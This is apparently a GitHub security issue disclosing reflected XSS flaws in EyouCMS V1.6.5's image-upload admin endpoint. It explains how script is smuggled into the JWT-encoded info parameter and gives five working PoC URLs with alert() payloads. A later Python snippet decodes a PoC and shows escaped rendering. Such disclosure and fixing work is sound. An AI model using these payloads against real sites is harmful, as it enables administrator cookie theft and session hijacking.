
EyouCMS-V1.6.5 has multiple reflective XSS vulnerabilities #57

Closed
@Hebing123

Description


Summary

In EyouCMS V1.6.5, when an image is uploaded locally, the program uses the info parameter to set the parameters carried by the upload form.
Multiple reflected XSS vulnerabilities can be created by modifying the JWT-encoded HEADER of the accepted JSON data and setting the parameters it contains to malicious values.
These parameters are: num, input, path, func, is_water.
There is no update on GitHub; the latest installation package (V1.6.5) is:
https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip

Details

Exploiting this XSS comes down to constructing the parameters carried by the form: the header values are placed directly into <input> elements on the page.
If the info parameter contains a "-" after JWT encoding, it must be replaced with a "+". The guess is that the developer implemented the URL encoding and decoding logic incorrectly, so that only "+" is accepted and not "-". This may be because they only considered standard encoding rules and ignored URL-safe encoding rules.

POC

HEADER: ALGORITHM & TOKEN TYPE:

```json
{
  "num": "1",
  "size": "2097152",
  "input": "",
  "func": "head_pic_call_back",
  "path": "allimg",
  "is_water": "1'\"()&%<zzz><ScRiPt >alert(9240)</ScRiPt>",
  "alg": "HS256"
}
```

Note: you do not need to carry any data when encoding; just encode the corresponding header parameter, replace "-" with "+", and then URL-encode the result. Do not perform these steps in the wrong order, or the "+" will be converted to a space.

When the num parameter in the header is used to trigger the reflected XSS, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

When the input parameter in the header is used to trigger the reflected XSS, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IlwiPjxTY1JpUHQgPmFsZXJ0KDk3NDUpPC9TY1JpUHQ%2BIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

When the path parameter in the header is used to trigger the reflected XSS, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0Nyk8L1NjUmlQdD4iLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

When the func parameter in the header is used to trigger the reflected XSS, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2tcIj48U2NSaVB0ID5hbGVydCg5NzQ2KTwvU2NSaVB0PiIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

When the is_water parameter in the header is used to trigger the reflected XSS, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nIiwiaXNfd2F0ZXIiOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0OCk8L1NjUmlQdD4iLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

Impact

An administrator who is already logged in can have their cookie stolen after visiting the malicious URL.
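As an added illustration (not code from this report or from EyouCMS), the Python below decodes the info parameter of the num PoC URL above the way a reviewer or WAF rule would, flags which of the five reflected header fields carry HTML metacharacters, and shows the attribute escaping the server should apply before placing those values into <input> tags. The render_hidden_inputs function is a hypothetical hardened renderer, not the project's own code; the lab address 192.168.160.147 is the one used in the report.

```python
import base64
import html
import json
import re
from urllib.parse import parse_qs, urlsplit

# Header fields the report says are reflected into <input> elements.
REFLECTED = ("num", "input", "path", "func", "is_water")
# Characters that close a quoted attribute or open a tag.
DANGEROUS = re.compile("[<>\"']")

# The "num" PoC URL from the report (lab host from the report, not a real target).
POC_URL = (
    "http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info="
    "eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXpl"
    "IjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIs"
    "InBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9"
    "&lang=cn&m=admin&unneed_syn="
)

def decode_info(url: str) -> dict:
    """URL-decode, then Base64-decode, the JWT-style header carried in info."""
    # parse_qs maps %2B back to '+' but a bare '+' to a space: this is the
    # ordering pitfall the report describes (URL-encode must come last).
    token = parse_qs(urlsplit(url).query)["info"][0]
    # Accept both the standard and the URL-safe alphabet, then restore padding.
    std = token.replace("-", "+").replace("_", "/")
    std += "=" * (-len(std) % 4)
    return json.loads(base64.b64decode(std))

def find_tainted(header: dict) -> dict:
    """Return the reflected fields whose values contain HTML metacharacters."""
    return {k: v for k, v in header.items()
            if k in REFLECTED and DANGEROUS.search(str(v))}

def render_hidden_inputs(header: dict) -> str:
    """Hypothetical hardened rendering (not EyouCMS code): every value is
    HTML-escaped, quotes included, before it lands inside value="..."."""
    return "".join(
        f'<input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(str(header[k]), quote=True)}">'
        for k in REFLECTED if k in header
    )

if __name__ == "__main__":
    hdr = decode_info(POC_URL)
    print("tainted fields:", find_tainted(hdr))
    print(render_hidden_inputs(hdr))
```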
